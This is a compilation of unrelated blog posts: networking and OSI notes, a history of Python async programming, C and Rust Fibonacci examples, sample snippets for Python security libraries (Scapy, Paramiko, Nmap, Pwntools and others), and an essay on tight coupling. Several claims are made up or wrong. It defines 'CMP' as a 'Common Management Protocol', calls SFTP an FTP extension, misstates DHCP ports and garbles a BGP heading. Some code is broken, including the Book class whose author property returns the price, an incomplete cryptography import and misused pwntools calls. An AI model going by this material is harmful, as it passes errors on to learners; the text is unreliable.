• Traceroute is a network troubleshooting tool that is used to trace the path that a packet takes from the source to the destination. It uses a combination of ICMP Echo Request (ping), UDP packets and TCP SYN packets to determine the path, and the time it takes for each hop (router) to respond. It is typically used to determine the path that a packet takes from the source to the destination, and to identify any bottlenecks or failures along the way. It uses the hop-limit, or Time-to-Live (TTL) field in the IP header to control the number of hops that the packet can make before it is discarded. The initial hop limit is typically set to 64 for *nix systems and 128 for windows.

Nmap:

• Nmap is a network discovery and security auditing tool that can be used to identify hosts and services on a computer network and discover vulnerabilities. It can be used to scan a single host, a range of IP addresses, or an entire network. It can be used to identify open ports on a host and to determine the operating system and version of the host. It can also be used to discover vulnerabilities and conduct security assessments.

Intercepts (PitM - Person in the middle):

• A "man-in-the-middle" (MitM) attack is a type of cyberattack where an attacker intercepts and alters the communication between two parties. This can be done by intercepting traffic between a client and a server, by intercepting DNS lookups, or by using other methods. To mitigate MitM attacks, it is important to use encryption and to use PKI (Public Key Infrastructure) to authenticate the identity of the parties involved in the communication.

VPN:

• A Virtual Private Network (VPN) allows users to securely connect to a private network over the internet. VPNs use encryption and authentication to secure the connection and protect the data being transmitted. While VPNs can be used to protect traffic from being seen by the ISP, it is important to note that the traffic is still visible to the VPN provider.

Tor:

• Tor (The Onion Router) is a network that is designed to provide anonymity and privacy to its users. It uses a system of relays to route traffic through multiple layers of encryption, making it difficult to trace the origin of the traffic. While Tor can make it difficult for investigators to find individuals on the network, they may still be able to identify the individual by analyzing other factors such as the timing, location, and type of traffic being sent.

Proxy:

• A proxy is a server that acts as an intermediary between a client and a server. Proxies can be used to improve security and privacy, but they are not foolproof solutions. Using multiple proxies, or "chaining" them, will not necessarily provide more security or privacy. It is also important to note that the traffic is still visible to the proxy server.

BG/buP:

• Border Gateway Protocol (BGP) is a protocol that is used to exchange routing information between routers in a network. BGP is used to connect different networks and is a crucial protocol that helps to hold the internet together.

Network traffic tools:

• Wireshark, Tcpdump, and Burp Suite are all tools that can be used to analyze and capture network traffic. Wireshark is a popular tool that allows you to capture, analyze and filter network traffic. Tcpdump is a command-line tool that is used to capture and analyze network packets. Burp Suite is a tool that can be used for web application security testing, it contains a proxy, spider and scanner.

HTTP/S:

• HTTP (Hypertext Transfer Protocol) is a protocol that is used to transfer data over the internet. HTTPS (HTTP Secure) is an extension of HTTP that uses SSL/TLS to encrypt the data being transmitted, it uses port 443.

SSL/TLS: SSL (Secure Sockets Layer) and TLS (Transport Layer Security)

• are protocols that are used to encrypt the data being transmitted over a network. They are commonly used to secure web traffic, email and other types of internet communication. It's important to understand the various algorithms and protocols used in SSL/TLS, including handshakes, encryption, signing, certificate authorities, and trust systems. There are many known vulnerabilities in SSL/TLS, like POODLE, BEAST, CRIME, BREACH, and HEARTBLEED, that have been discovered and patched over the years.

TCP/UDP:

• TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are transport layer protocols that are used to transmit data over a network. TCP is a connection-oriented protocol that guarantees the delivery of data by retransmitting lost packets, while UDP is a connectionless protocol that does not guarantee delivery. Web traffic, chat, VoIP, and traceroute are examples of applications that use TCP or UDP. Streaming applications can slow down network connections that use TCP.

CMP:

• CMP stands for Common Management Protocol, and it is used for managing network devices. The most common CMPs are ping and traceroute. Ping is a utility used to check if a specific IP address is reachable. Traceroute is a utility used to trace the path that a packet takes to reach a destination.

Mail:

• SMTP (Simple Mail Transfer Protocol) is used for sending emails, it uses ports 25, 587 and 465. IMAP (Internet Message Access Protocol) is used for accessing emails on a server, it uses ports 143 and 993. POP3 (Post Office Protocol version 3) is used for retrieving emails from a server, it uses ports 110 and 995.

SSH:

• SSH (Secure Shell) is a protocol that is used to securely log into remote computers. SSH uses port 22 and it uses asymmetric encryption to exchange a symmetric key.

Telnet:

• Telnet is a protocol that allows remote communication with hosts. It uses ports 23 and 992. Telnet transmits data in clear text, so it is not secure.

ARP:

• ARP is the Address Resolution Protocol. It is used to map an IP address to a MAC address on a LAN. When a device wants to communicate with another device on the LAN, it will first check its ARP cache to see if it already knows the MAC address associated with the IP address. If it doesn't, it will broadcast an ARP request packet asking "Who has IP address X? Tell Y" where X is the IP address it is trying to reach and Y is its own IP address. The device with IP address X will respond with its MAC address, and the sender will then update its ARP cache with this information.

DHCP:

• DHCP (Dynamic Host Configuration Protocol) is used to dynamically assign IP addresses to devices on a network. DHCP uses ports 67 and 68 for servers and ports 546 and 547 for clients. DHCP can be configured to assign addresses automatically, leases IP addresses to devices and remembers the MAC and IP pairing in a table, or it can be configured to assign addresses manually, where static IP addresses are set by an administrator.

IRC:

• IRC (Internet Relay Chat) is a protocol for real-time text communication. It is used by hackers to create botnets, which are networks of infected computers that are controlled remotely.

FTP/SFTP:

• FTP (File Transfer Protocol) is used to transfer files between computers. It uses port 21. SFTP (Secure File Transfer Protocol) is an extension of FTP that provides a secure way to transfer files. It uses port 22, the same port as SSH.

HTTP headers are a part of the HTTP request and response that provide additional information about the request or response. They contain various information, such as the type of request (verb), the requested path, the HTTP version, the domain, the accepted language, the accepted character set, the accepted encoding, the connection status (close or keep-alive), the referrer, the return address and the expected size. These headers are used by servers and clients to understand the request and provide the appropriate response. They are also used by web developers to optimize the performance of their web pages and by security professionals to detect and prevent attacks.

Broadcast domains refer to the area of a network where broadcast traffic can be heard by all devices. Collision domains refer to the area of a network where a collision can occur, such as on a shared Ethernet network.

A Root store is a collection of trusted root certificates used to verify the authenticity of digital certificates used in SSL/TLS connections.

CAM table overflow occurs when a switch's Content Addressable Memory (CAM) table reaches its maximum capacity and can no longer store new MAC addresses. This can cause issues with network connectivity and is typically resolved by upgrading the switch or increasing its CAM table size.

Well, here we are. Finally done with networking. I encourage you to read deeply to understand networking before jumping to the next part.

In the next article, we are going to dive into web applications.

The Gracenolan notes

Follow me on github

what is computer networking?

• Computer networking is the practice of linking computer devices together to facilitate communication and the sharing of resources. This can be done through wired or wireless connections and can be accomplished using various protocols and technologies. Networking enables computers to share data, resources, and access such as printers and scanners. It also allows for remote access and communication, enabling users to access resources on other devices or networks. Common examples of computer networks include local area networks (LANs), wide area networks (WANs), and the internet.

Let's look at the OSI model.

The OSI (Open Systems Interconnection) model is a framework that describes how different protocols and technologies work together to enable communication in a networked environment. The OSI model consists of seven layers, each with a specific function and role in the communication process:

• Physical Layer: responsible for transmitting raw data bits over a communication channel.

• Data Link Layer: responsible for creating a reliable link between two devices on a network.

• Network Layer: responsible for routing data packets across multiple networks.

• Transport Layer: responsible for ensuring that data is delivered reliably and in the correct order.

• Session Layer: responsible for establishing, maintaining, and terminating communication sessions between devices.

• Presentation Layer: responsible for translating and formatting data so that it can be understood by the application layer.

N.B

Application Layer: responsible for providing a user interface and a set of protocols that applications can use to communicate over the network.

Why the OSI model?

The OSI model is useful as a reference model and helps to understand the different components and protocols that are involved in communication between devices in a networked environment.

Let's look at each layer of the OSI model...

Physical; layer 1 (Bits over fiber):

• The physical layer, also known as layer 1 in the OSI model, is the lowest and is responsible for transmitting raw data bits over a physical medium. It defines the electrical, mechanical, and functional characteristics of the interface between the networked device and the transmission medium. It defines the physical connectors, signaling, and voltage levels used to transmit data. In the case of transmitting bits over fiber, the physical layer would define the type of fiber-optic cable and the method of transmitting data over it, such as using infrared or visible light. It also defines the connector types, such as LC, SC, or ST, used to connect the devices to the cable, as well as the speed of data transfer.

Datalink; layer 2 (Error checking and frame synchronisation):

• The data link layer, also known as layer 2 in the OSI model, is the second layer and is responsible for creating a reliable link between two devices on a network. It provides error checking and correction to ensure that data is transmitted accurately and also performs frame synchronization.

• Error checking is done by using various techniques such as parity bit, cyclic redundancy check (CRC), or checksums, which are added to the data frames to detect errors that may have occurred during transmission. These techniques allow the receiver to detect errors and request the retransmission of the corrupted data.

• Frame synchronization is the process of aligning the data frames so that the receiver can properly interpret the received data. This is done by adding special characters called start and stop bits, or by using a special protocol such as a preamble or a frame delimiter.

• The data link layer also assigns logical addresses (MAC addresses) to each device on the network, which are used to identify the source and destination of each data frame. This layer also handles the flow control, which ensures that the sender does not overwhelm the receiver with too much data at once.

Overall, the data link layer provides a reliable connection between two devices on a network by detecting and correcting errors, and by properly aligning and sequencing the data frames.

Network; layer 3 (Routing):

• The network layer, also known as layer 3 in the OSI model, is responsible for routing data packets across multiple networks. It is responsible for logical addressing, also known as IP addressing, and for determining the best path for data to travel from its source to its destination.

• The network layer uses logical addresses, such as IP addresses, to identify devices on a network. It also uses routing protocols, such as OSPF, BGP, and RIP, to determine the best path for data to travel from its source to its destination. Routing protocols use algorithms to calculate the best path based on factors such as distance, bandwidth, and reliability.

• The network layer also provides mechanisms for handling the fragmentation and reassembly of packets. Fragmentation occurs when a packet is too large to be transmitted over a particular link, and it needs to be divided into smaller packets before being sent. The network layer takes care of this process and also reassembles the packets at the destination.

• The network layer also provides Quality of Service (QoS) mechanisms, which allow certain types of traffic to be given priority over others. This is important for real-time applications such as VoIP and video streaming.

Overall, the network layer provides the necessary functionality for routing data packets across multiple networks, and for ensuring that data is delivered to its destination efficiently and reliably.

Transport; layer 4 (TCP/UDP):

• The transport layer, also known as layer 4 in the OSI model, is responsible for ensuring that data is delivered reliably and in the correct order. It provides logical communication between the applications running on different hosts and ensures that data is delivered error-free.

• The transport layer uses two main protocols: TCP (Transmission Control Protocol) and UDP (User Datagram Protocol).

• TCP is a connection-oriented protocol that establishes a reliable link between two devices before data is transmitted. It uses a three-way handshake to establish a connection and then uses flow control and error-checking mechanisms to ensure that data is transmitted accurately. TCP is used by applications that require a reliable connection, such as web browsing, file transfer, and email.

• UDP, on the other hand, is a connectionless protocol that does not establish a connection before data is transmitted. It does not provide error checking or flow control, but it is faster and has less overhead than TCP. UDP is used by applications that do not require a reliable connection, such as streaming media, online gaming, and VoIP.

• The transport layer also provides port numbers to identify different applications running on the same host and multiplexing and demultiplexing mechanism to ensure that the data is delivered to the right application.

Overall, the transport layer provides the necessary functionality for ensuring that data is delivered reliably and in the correct order, and for providing logical communication between the applications running on different hosts.

Application; layer 7 (and basically layers 5 & 6) (includes API, HTTP, etc):

• The application layer, also known as layer 7 in the OSI model, is the highest in the network stack and is responsible for directly interacting with the application or user. It includes protocols such as HTTP, FTP, and SMTP, and is responsible for providing a user interface for interacting with the network. It also includes application programming interfaces (APIs) which allow different software applications to communicate and share resources.

• The application layer is responsible for providing the necessary functionality for the applications to access the network and exchange data. It defines the syntax, semantics, and synchronization of communication and the negotiation of any authentication and privacy scheme.

• HTTP, the most widely used protocol on the internet, is used for communication between web browsers and web servers, and it allows for the exchange of hypertext documents. FTP (File Transfer Protocol) is used for transferring files between computers, and SMTP (Simple Mail Transfer Protocol) is used for sending and receiving emails.

• In many modern implementations, layers 5 and 6, the session and presentation layers respectively, have been subsumed into the application layer. The session layer, which was responsible for establishing, maintaining, and terminating communication sessions between devices, is now commonly included in the application layer. The presentation layer, which was responsible for translating and formatting data so that it can be understood by the application layer, is also often included in the application layer.

Overall, the application layer provides a user interface for interacting with the network and enables the communication between different software applications and the network.

That's it for today. next, we shall go through firewalls, NAT, DNS, etc...

Gracenolan notes on github

Follow me on twitter: WarrenMu

Introduction

According to Wikipedia

Asynchrony, in computer programming, refers to the occurrence of events independent of the main program flow and ways to deal with such events.

In simple terms, this means that the program executes tasks according to which task is ready to run and not following a strict order of tasks. To understand this better, let's use an analogy of the school cook serving lunch to the students that have lined up in a queue. The lunch menu has rice, matooke (bananas), fish, beef and Gnut sauce. The students can pick whatever they wish from the menu. If one student being served by the cook could not make up their mind on if to have the fish or the beef, then they would be wasting time in the queue and blocking the other students from being served. To unblock the queue, the other students need to be allowed to cut in front of the thinking student who is still trying to make up his mind so that they can be served by the cook and later the cook would serve the thinking student after he's made up his mind. This is the same case when it comes to software.

The main reason for asynchronous programming is to speed up the execution of a program or programs by allowing the computer to run multiple execution contexts at the same time and creating non-blocking execution environments. The execution contexts can be an operating system process (OS process), operating system thread (OS thread) or green thread

Threads and Processes

Again Wikipedia defines processes as

In computing, a process is the instance of a computer program that is being executed by one or many threads.

Basically, a process is a uniquely running program. A single program can be run in many processes, just like one can have many windows of their text editor open. Depending on the operating system, a process can also have the ability to start other processes of different programs or even launch child processes from itself. In python, we can work with multiple processes using the standard library multiprocessing module.

Depending on the operating system, programs are implemented as a collection of threads. According to Wikipedia

In computer science, a thread of execution is the smallest sequence of programmed instructions that can be managed independently by a scheduler, which is typically a part of the operating system

Threads are like internal virtual machines inside a program that run tasks. Theoretically, a program can start as many threads as it wishes. In practice, the number of threads is limited by the memory available.

Both processes and threads were designed to solve the problem at hand, which is to enable us to run multiple tasks at the same time. However, they both come at an expensive cost. First of all, they both take up a huge amount of space and thus limiting the number of execution contexts we can have. In the case of a web server, if we were to start a new process or new thread for every client that connected to our server, the performance of the server will start slowing down by the time we reach 2000 processes or threads on some operating systems since memory would be eaten up immensely. Also, the barrier between process communication exerts a heavy toll on them since there's an overhead for 2 processes to communicate. And for threads however much they do not have the communication barrier like processes, the context switching between threads introduces a significant overhead. context switching is basically what the operating system does while juggling multiple threads on a single CPU or core. It has to save the state of the currently running thread in memory and then load a new thread to run for some time, then again save that thread's context, stop it and load a new thread and keep switching between them like that. All of this has significant overhead.

And when it gets to multithreading in python, it is heavily impacted by the global interpreter lock (GIL). The GIL only allows one python thread to run at a time, which hinders optimizations that might be provided by modern operating systems for multithreaded programs. And since one python thread can be run at a time, it means python will cut short a thread right in the middle of its important execution such as validating a user or reading from a database. This is called preemptive multithreading and it's the cause of expensive context switches. It also might lead to some software faults if not handled carefully

Green threads

Green threads, or proto threads as they might be known in other terms, are execution contexts that are implemented in a language's runtime and try to mimic the working of OS-level threads. They run in the same process and within the same thread of execution provided by the OS. Due to their extremely lightweight nature, hundreds of thousands of green threads can be typically run by a language runtime.

Implementation

To implement green threads in any language runtime, we need to first know how the operating system handles its threads, why they're so expensive and how we can implement lightweight versions in our runtime. First of all, we've already outlined the fact that every OS thread takes up a significant amount of memory to save its context, and also the OS Scheduler takes a lot of time switching between various threads. There are more issues caused by synchronization techniques such as mutexes and semaphores which cause lock contention, lock starvation and other disadvantages of using locks

Knowing that, we go ahead to design our green threads with two major goals in mind, that is to say, they should be very memory efficient hence lightweight, and have fast context switching. Because green threads are implemented with memory-efficient language machinery we can have hundreds of thousands of them run in a single process. And given the fact that they run in the same process and same thread, we eliminate the need for context switching by the OS and handle it ourselves, which makes it extremely fast.

Green threads in python

Before the advent of asyncio, significant efforts in the python world were done to create libraries that provide green threads. One of the major pioneers was greenlet which implemented an industry-used framework to work with green threads. The twisted project came in later which also introduced an easy-to-use industry framework to build web servers and services using python green threads. coming to today, lots of frameworks have been written to help use python green threads, and asyncio has created the standard for working with these green threads.

Implementing python green threads with generators

So let us walk the journey of the evolution of green threads in python and how they were implemented over time up to this day.

First of all, we need to ask ourselves how we can implement green threads. From what we had mentioned earlier in the previous section, green threads should be able to mimic OS threads by having the ability to run a task and also allowing for context switching since all the green threads should share a single process to execute. One significant feature of the python language has qualities that might help us implement this, and those are generators. Python generators were first standardized in PEP 255: Simple Generators as early as the year 2000 and they provide a way of creating iterators that can be executed on demand. This implicitly means that generators can run a task since they are functions in themselves, and also can save their state to be resumed later. So they can be paused and resumed, a key feature to help us build green threads since we need our execution environment to pause a running task and resume it later without impact.

Generators can also not be paused by the outside world but can only be paused from within after yielding their value. This means that the green threads we write tell the execution environment when to be paused and not the execution environment abruptly deciding when to stop the thread. So if the green is in the middle of an important database transaction or memory access, it can run without interruption until it feels safe to yield its control back to the execution environment. This is called cooperative multitasking.

Alright, enough with the jibberish. Let's try to implement a green thread system in python. To implement the green thread system, we need two components: The green thread itself and the executor running the green threads in a loop. The executor is commonly known as the event loop. But before we dig deep into the implementation, let us first have a brief look at generators in python.

# A simple generator that yields values from a list of numbers
nums = [ num for num in range(20)]

def num_generator (num_list):
    index = 0                     #index of elements in the number list
    max_index = len(num_list) - 1    #the maximum index of elements in a list
    while (index <= max_index):
        temp_index = index        #hold the current index
        index += 1                #increment to next index
        yield num_list[temp_index]#yield value at current index

def printer ():
    for num in num_generator(nums):
        print(num)

printer()

The above example shows us the basic structure of a typical generator. Any functional generator should have a loop and a yield statement. Our num_generator generator function yields one number at a time when iterated over in the printer function. If we wanted to have more control of the execution of the generator, we would use the built-in next function which tells the generator to yield the next value and pause.

# A simple generator that yields values from a list of numbers
nums = [ num for num in range(20)]

def num_generator (num_list):
    index = 0                     #index of elements in the number list
    max_index = len(num_list) - 1    #the maximum index of elements in a list
    while (index <= max_index):
        temp_index = index        #hold the current index
        index += 1                #increment to next index
        yield num_list[temp_index]#yield value at current index

def printer ():
    max_times = 10        #maximum number of times to call next
    counter = 0
    num_gen = num_generator(nums)
    while (counter <= max_times):
        num = next(num_gen)
        counter += 1
        print(num)

printer()

We've updated the code in the printer function to call next on the num_gen generator and terminate when the counter is greater than max_times.

Let us now have three instances of the generator function become our threads and then create an executor to run them.

# A simple generator that yields values from a list of numbers
nums = [ num for num in range(20)]

def num_generator (num_list):
    index = 0                     #index of elements in the number list
    max_index = len(num_list) - 1    #the maximum index of elements in a list
    while (index <= max_index):
        temp_index = index        #hold the current index
        index += 1                #increment to next index
        yield num_list[temp_index]#yield value at current index

def executor ():
    # create a list of three green threads
    green_threads = [num_generator(nums) for _ in range(3)]
    while len(green_threads):        # while green threads still in list
        for thread in green_threads: # execute each thread in list
            num = next(thread)
            if (num >= 10):
                green_threads.remove(thread)
            else:
                print(num)

executor()

In the above code snippet, the threads in the green_thread list are run concurrently and removed if they yield a value greater or equal to ten. This is a simple demonstration of how to use a list of generators and an evaluation loop as a green threads system, but this is not what happens in practice

Generators as coroutines

We have taken a glimpse at generators in the above section and how we can work with them as green threads. Looking at how we implemented our system earlier, it looked like we had a set of running routines (functions) that participated in the cooperative multithreading model in that one routine yielded control back to the executor to run the next routine after it was done with its temporary execution. These cooperatively running routines are called coroutines.

Generators feel like coroutines, but not as quite. This is because we can currently only retrieve data from them and cannot send data inside them for processing. They feel more like data producers, and indeed they are powerful data producers. We can also not explicitly close a generator unless it raises a StopIterationError on its own. This is important since we need to have full execution of our green threads and stop their execution in case something goes wrong. So to use them as coroutines, we need a key ingredient which is the ability to interact with these coroutines as they are running, probably to change their execution state or feed in more data for processing and more.

For that PEP 342: Coroutines via enhanced generators was devised in 2005. It extended the simple python generators from PEP 255 into more usable coroutines by adding the ability to send data into a running generator using now the newly added send method, send and error into the generator using the throw and also stop it if needed using the close method. With these changes, it means now we can implement proper green threads using coroutines as described in PEP 342. Note that the send method is not meant to send large chunks of data into a running generator, but you can use it to send control statements to change the execution state of a generator in case it was implemented as a finite state machine. Also if we call the send method with None as the argument, we're just telling the coroutine to execute in the same way we'd use the next built-in function. For fear of an exceedingly long blog post, I'll not place examples for this, but I'll add a link to a very detailed series of youtube videos by a python core developer explaining the internals quite simply and in detail.

Factoring out the generator

It became pretty apparent after the prominent use of generator-based coroutines that developers needed to factor out the "yield" statements from the coroutines to avoid redundancy. This was because generators could only yield to their immediate caller and it was getting hard to reuse some parts of code across different codebases. PEP 380: Syntax for delegating to a sub-generator was devised in 2009 to solve this problem, and it introduced the use of "yield from" to extract a generator part of a coroutine and place it in a sub-generator which would let the sub-generator be used a cross different modules and libraries. For brevity, more detail on the use of "yield from" can be read in this article.

Async, Await and Asyncio

If you followed through the evolutionary journey of the python coroutine stack, you're now at the final stage of the evolution cycle. In the previous section of Factoring out the generator, we talked about the introduction of the "yield from" statement and how it was used to factor out sub-generators to create reusable code. Well, it turns out that "yield" and "from" are two independent python keywords that are fundamentally different in how they are interpreted by python developers, and having them work together in this way was getting confusing. Not to mention, the industry had begun standardizing a given set of keywords to use for coroutines, namely "async" and "await statements. To sort out the confusion and also meet industry standards, PEP 492: Coroutines with async and await syntax. The PEP replaced the use of "yield from" with "await", and also mandated that every function that has an "await" keyword inside its block should be marked with an "async" keyword. Fundamentally, the async-await coroutines are still generators, and they have the same API as generators do.

With the async and await syntax established, the asyncio library was also standardized in PEP 3156: Asynchronous IO support rebooted, the "asyncio" Module after much work on the Tulip project by Guido van Rossum himself

Conclusion

This blog post was meant as a study of the origin and importance of asynchronous programming, especially in python, and how it evolved with time. It's not meant as a tutorial for the asyncio library and writing async code, but rather to answer a few questions about why you should take time to learn asynchronous programming. There are lots of tutorials out there to help you get started with asyncio and I wouldn't wish to duplicate the efforts, I'll just add links to what I feel is the best material out there for learning asyncio.

This blog post is but a mere fraction of the entire plethora of knowledge out there about asynchronous programming in python, but I do hope it helps you answer the most fundamental questions that I also had to ask while starting out my journey of mastering asyncio.

Links

Videos

Guido presents project Tulip; Twitter university

Guido on Tulip; Bay Piggies

import Asyncio; EdgeDB

articles

Python Asyncio: The complete guide; superfast python

Asyncio in Python: A complete walkthrough; Real Python

To create a simple Fibonacci sequence in C, you could use the following code:

#include <stdio.h>

int main() {
   int i, n, t1 = 0, t2 = 1, nextTerm;

   printf("Enter the number of terms: ");
   scanf("%d", &n);

   printf("Fibonacci Series: ");

   for (i = 1; i <= n; ++i) {
      printf("%d, ", t1);
      nextTerm = t1 + t2;
      t1 = t2;
      t2 = nextTerm;
   }
   return 0;
}

To create a simple Fibonacci sequence in Rust, you could use the following code:

fn main() {
    let mut t1 = 0;
    let mut t2 = 1;
    let mut next_term;
    let n = 10;

    println!("Fibonacci Series: ");

    for _ in 0..n {
        next_term = t1 + t2;
        t1 = t2;
        t2 = next_term;

        println!("{}", t1);
    }
}

It is difficult to determine which version of the code will be faster without profiling them and comparing the performance. In general, C is known for being a fast and efficient language, while Rust is designed to provide the performance of a systems language while being safer and easier to use.

It is difficult to determine which of the two languages, C or Rust, is the "best" to use in cybersecurity based on the simple Fibonacci sequence examples provided. Both C and Rust are powerful languages that are used in a variety of applications, including in the field of cybersecurity.

In the field of cybersecurity, either C or Rust could be a good choice, depending on your specific needs and goals. Both languages have their own strengths and limitations, and the best choice for your project will depend on the requirements and constraints of your project.

In general, if you are new to programming and are looking for a language that is easier to learn and use, Rust may be a better choice for you. On the other hand, if you have experience with C or other low-level languages and are comfortable with the complexity and challenges of systems programming, C may be a better choice. Ultimately, the best language for your project will depend on your specific goals and requirements.

As you can see all languages can run the same code but different syntax. All compiled, and fast.

As security developers, we need to know the libraries to use when creating hacking tools.

There are a number of libraries that can be used for ethical hacking and cyber security in Python. Some examples include:

Scapy: A powerful packet manipulation library that allows you to craft custom packets, send them over the wire, capture and analyze them, and more. It can be used for tasks such as network scanning, service fingerprinting, and exploitation.

Paramiko: A library for implementing SSH and SFTP in Python. It can be used to remotely execute commands, transfer files, and manage remote servers.

Cryptography: A library for encrypting and decrypting data, as well as other cryptographic tasks such as generating hashes and signing messages.

Pwntools: A library specifically designed for writing and testing exploits. It includes features such as automatic exploit generation and a debugger.

Nmap: A popular network scanning tool that can be used to discover hosts and services on a network, as well as to perform security assessments. The Nmap library allows you to use Nmap from within Python.

SocksiPy: A library for implementing SOCKS proxies in Python. It can be used to establish anonymous connections, bypass firewalls, and more.

Requests: A library for making HTTP requests in Python. It can be used for tasks such as testing web servers, submitting forms, and automating login processes.

These are just a few examples of the many libraries that can be used for ethical hacking and cyber security in Python.

Here are simple example scripts for each of the libraries mentioned above:

Scapy

Import the Scapy library

from scapy.all import *

Create a custom packet

packet = IP(dst="www.example.com") / ICMP()

Send the packet and receive the response

response = sr1(packet)

Print the response

print(response)

Paramiko:

Import the Paramiko library

import paramiko

Set up the SSH client

client = paramiko.SSHClient() client.load_system_host_keys() client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

Connect to the server

client.connect("www.example.com", username="user", password="password")

Execute a command

stdin, stdout, stderr = client.exec_command("ls")

Print the output of the command

print(stdout.read())

Disconnect from the server

client.close()

Cryptography:

Import the Cryptography library

import cryptography

Generate a random key

key = cryptography.fernet.Fernet.generate_key()

Create a Fernet object using the key

fernet = cryptography.fernet.Fernet(key)

Encrypt some data

data = b"secret message" encrypted_data = fernet.encrypt(data)

Decrypt the data

decrypted_data = fernet.decrypt(encrypted_data)

Print the original and decrypted data

print(data) print(decrypted_data)

Pwntools:

Import the Pwntools library

import pwn

Connect to a remote server

pwn.connect("www.example.com", port=12345)

Send a message to the server

pwn.sendline("Hello, server!")

Receive a response from the server

response = pwn.recv()

Print the response

print(response)

Disconnect from the server

pwn.close()

Nmap:

Import the Nmap library

import nmap

Create an Nmap scanner object

scanner = nmap.PortScanner()

Scan a host for open ports

scanner.scan("www.example.com", "1-1024")

Print the results of the scan

print(scanner.scaninfo()) print(scanner.csv())

SocksiPy:

Import the SocksiPy library

import socks import socket

Set up a SOCKS proxy

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "localhost", 1080) socket.socket = socks.socksocket

Connect to a remote server through the proxy

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("www.example.com", 80))

Requests:

Import the Requests library

import requests

Make a GET request to a web server

response = requests.get("https://www.example.com/")

Print the status code and the content of the response

print(response.status_code) print(response.content)

Make a POST request to a web server

response = requests.post("https://www.example.com/login", data={"username": "user", "password": "password"})

Print the status code and the content of the response

print(response.status_code) print(response.content)

Stay tuned for more. And build put on your tools using the headups on these libraries. 👍

One day, he was given a package to deliver to the Mulindwas. He got into his delivery van to take the package to the Mulindwas. To his shock, he found the Mulindwas' house empty. It looked like they had moved. "To where?" Tom wondered to himself, "and what should I do with the package now?" he wondered even more. He tried asking around to find out where the Mulindwas had moved to, but it was all in vain. Not having any other choice, he decided to take back the package to the company. More and more packages were given to him to deliver to the Mulindwas, but he could not. And whenever he returned them, the packages were just placed in storage. They later sold them without anyone to claim them.

There is a lesson to learn about Tom's relationship with the Mulindwa family or the Mulindwa residence in particular. Tom was so accustomed to the Mulindwa residence that he never thought they'd ever move from that place. The Mulindwas also did not bother to inform Tom and the delivery company of their moving and their new address, so the company could not locate them. The attachment between Tom and the Mulindwas is what we call in software terms "tight coupling". When systems are tightly coupled, they are interdependent, and a change in one system may lead to the failure of the other.

Tightly coupled systems

Tightly coupled systems are characterized by programs that rely too much on each other to perform a given task. The programs expose to each other a set of API functions to call to run operations, and also the programs assume a lot of internal detail about the running of each other. For example in the case of Tom, he knew quite a lot about the time The Mulindwas woke up, their time for breakfast, the schools that John Mulindwa and Emily Mulindwa went to and the time they got back from school, basically he knew a lot about them. If you are worried about the security of the Mulindwa family in case Tom was a threat actor, then you absolutely should be. If one program knows a lot about how another program runs internally, there's a high chance it will be dependent on those steps to run before it also runs. And if program A exposes internal details to program B that can be modified to alter the running of A, then the system is almost beyond saving, as malicious code can easily corrupt it and the entire system

Tightly coupled systems are usually developed at the earlier stages of a project, and in most cases usually arise due to poor architectural design of the project. Tightly coupled systems are not scalable as they limit the interdependent programs from evolving independently of each other and according to the needs of each program. It means that if a change has to be made in program A, then program B has to be changed as well to reconcile with the new change in A to avoid failure. If there were over 100 programs or services interdependent of each other, it would be hard to reconcile the change in A among all the connected programs and hence impacting the scalability of the entire system.

Tightly coupled systems occur in various parts of a system, from variables inside a program to massive backend service clusters. So to deal with tightly coupled systems, we need to know at what level the coupling is happening. The general and most effective solution to coupling is introducing layers of abstraction into the system. These layers of abstraction should then only communicate to each other via message passing. the surface layer receives the message from the external program and transports it into the internal layers for processing. The internal layers then pass back a response to the surface API which is communicated back to the listening program. In case there's a change in the internal state of the processing program, the listening program is not affected. So to fix the problem with Tom and the Mulindwas, Tom is now supposed to deliver mail to the local regional mail receiver which will transport them to the mailboxes of the residents in that neighborhood. This limits Tom's direct interaction with residents. And when the Mulindwas move, they only leave their new delivery address to the regional mail receiver who can still route their mail to them, Tom can still keep delivering mail without knowing if the Mulindwas moved or not. It also relies on the heartbreaking moment where the Mulindwas have to say goodbye to Tom.

So to put some of the concepts discussed above into practice, he's how we would implement some software abstractions.

At the language level, if one is using the object-oriented paradigm, the objects should not expose their internal state. And if they should, external programs should not modify that state directly.

class Book (object):
    def __init__ (self,
        name:str,
        author:str,
        price:int,
    ) -> None:
        self._name = name
        self._author = author
        self._price = price

    @property
    def price (self):
        return self._price

    @property
    def author (self):
        return self._price

    @property
    def price (self):
        return self._price

for example in the code snippet above. we have a book class with three internal attributes: _name,_author,_price. These attributes are only accessed (or should be accessed) by the internal methods of the class and external programs only interact with these attributes via the property descriptors. This means that external programs cannot modify these attributes, and if they should, we can extend the property descriptors to have controlled modifications. So even when we change the internal attributes to something else, the external programs can still interact with our class as if nothing has changed. For example, I'll change the _author attribute to retrieve its value from an external database

import sqlite3
con = sqlite3.connect("bookstore.db")
cur = con.cursor()

class Book (object):
    def __init__ (self,
        name:str,
        author:str,
        price:int,
    ) -> None:
        self._name = name
        self._author = cur.execute('SELECT authors FROM Books WHERE authors = ? ',author)
        self._price = price

    @property
    def price (self):
        return self._price

    @property
    def author (self):
        return self._price

    @property
    def price (self):
        return self._price

The above code is not tested, but should not be used as well unless you place a try except block around the _author attribute to protect you from name errors when the author is not found in the database. Anyways, with this level of detail added, our external program does not know that we've included this. They will happily interact with our API without fear.

Bigger systems combat coupling by introducing message queues and relying on the event-driven design pattern. Message queues help your system scale and allow you to plug in new services with little to no need for configurations and changes in the entire system. This helps you deploy products much faster and lessens your time to market. It also contributes to the high availability of the system.

CPython case study

The Python programming language is among the most popular, or even the most popular programming language in the world currently. It has many implementations, with the most popular being the reference implementation in C called CPython. Other implementations include PyPy, GraalPython, IronPython, Jython etc (The last two are no longer maintained.)

